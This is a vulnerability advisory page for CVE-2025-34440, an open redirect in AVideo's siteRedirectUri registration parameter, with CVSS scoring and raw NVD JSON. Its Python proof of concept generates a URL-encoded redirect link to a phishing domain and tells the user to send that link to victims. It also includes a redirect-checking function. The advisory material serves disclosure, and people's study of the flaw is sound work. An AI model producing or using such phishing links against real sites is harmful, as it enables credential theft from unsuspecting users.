Security Vulnerability Report
CVE-2025-34440 CVSS 6.1 MEDIUM

CVE-2025-34440

Published: 2025-12-17 20:15:55
Last Modified: 2025-12-19 19:15:52

Description

AVideo versions prior to 20.1 contain an open redirect vulnerability caused by insufficient validation of the siteRedirectUri parameter during user registration. Attackers can redirect users to external sites, facilitating phishing attacks.

CVSS Details

CVSS Score: 6.1
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:* - VULNERABLE
AVideo < 20.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import urllib.parse

# CVE-2025-34440 PoC - Open Redirect in AVideo siteRedirectUri parameter
# Target: AVideo versions prior to 20.1
# Attack: Redirect users to external malicious site via registration


def generate_evil_redirect_url(target_url, evil_domain):
    """
    Generate malicious redirect URL

    Args:
        target_url: Target AVideo instance URL
        evil_domain: Attacker's controlled domain for redirect

    Returns:
        Malicious URL with siteRedirectUri parameter
    """
    register_path = "/register"
    redirect_param = "siteRedirectUri"

    # Encode the evil URL to bypass basic filters
    encoded_redirect = urllib.parse.quote(evil_domain, safe='')

    # Construct the malicious URL
    malicious_url = f"{target_url.rstrip('/')}{register_path}?{redirect_param}={encoded_redirect}"
    return malicious_url


def verify_open_redirect(target_url, evil_domain):
    """
    Verify if the target is vulnerable to open redirect

    Args:
        target_url: Target AVideo instance URL
        evil_domain: Domain to test redirect

    Returns:
        True if vulnerable, False otherwise
    """
    register_path = "/register"
    redirect_param = "siteRedirectUri"
    test_url = f"{target_url.rstrip('/')}{register_path}?{redirect_param}={evil_domain}"

    try:
        response = requests.get(test_url, allow_redirects=False, timeout=10)

        # Check if redirect occurs to external domain
        if response.status_code in [301, 302, 303, 307, 308]:
            location = response.headers.get('Location', '')
            if evil_domain in location or evil_domain in location.replace('http://', '').replace('https://', ''):
                return True
        return False
    except requests.RequestException as e:
        print(f"Error: {e}")
        return False


if __name__ == "__main__":
    # Configuration
    target = "https://target-avideo-site.com"
    evil = "https://phishing.example.com"

    # Generate malicious URL
    malicious_url = generate_evil_redirect_url(target, evil)
    print(f"Malicious URL: {malicious_url}")
    print(f"\nSend this URL to victims to redirect them after registration")

    # Check vulnerability (for authorized testing only)
    # is_vulnerable = verify_open_redirect(target, evil)
    # print(f"Vulnerable: {is_vulnerable}")
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-34440", "sourceIdentifier": "[email protected]", "published": "2025-12-17T20:15:54.557", "lastModified": "2025-12-19T19:15:51.617", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "AVideo versions prior to 20.1 contain an open redirect vulnerability caused by insufficient validation of the siteRedirectUri parameter during user registration. Attackers can redirect users to external sites, facilitating phishing attacks."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": 
"NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-601"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*", "versionEndExcluding": "20.0", "matchCriteriaId": "383A7EA7-DFBC-4127-981F-552BFD0B3CED"}]}]}], "references": [{"url": "https://chocapikk.com/posts/2025/avideo-security-vulnerabilities/", "source": "[email protected]"}, {"url": "https://github.com/WWBN/AVideo/commit/4a53ab2056", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/WWBN/AVideo/commit/77c70019b0", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://www.vulncheck.com/advisories/avideo-open-redirect-via-siteredirecturi-parameter", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}